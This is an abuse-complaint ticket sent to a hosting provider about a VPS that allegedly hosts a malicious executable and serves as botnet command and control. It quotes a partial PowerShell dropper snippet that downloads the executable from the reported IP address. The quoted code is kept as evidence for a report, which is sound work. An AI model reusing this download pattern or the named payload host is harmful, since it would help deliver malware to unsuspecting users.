[Ticket#2025112010005621] [Action required] Your Cloud VPS 10 NVMe (158.220.93.201): Abuse complaint to be handled

To the Contabo Abuse Team,

I am writing to report a critical security violation originating from your network. The server located at IP address 158.220.93.201 is actively hosting and distributing malware disguised as system utilities.

Evidence of Malicious Activity:
1. Malware Hosting: The server hosts a malicious executable at: http://158.220.93.201/taskhostcore.exe
2. Command & Control: The server is acting as a C2 (Command and Control) center for a botnet.
3. Target Audience: The malware is being distributed in a manner that targets inexperienced users, including minors, posing a significant risk to their safety and data privacy.

Technical Proof (PowerShell Dropper Snippet):
  powershell
$updateServer = "http://158.220.93.201"
$moduleEndpoint = "/taskhostcore.exe"
$client.DownloadFile($downloadUri, $modulePath)


This violates your Terms of Service regarding illegal activity and malware distribution. I request the immediate suspension of this server to prevent further harm.

Regards,
A concerned researcher.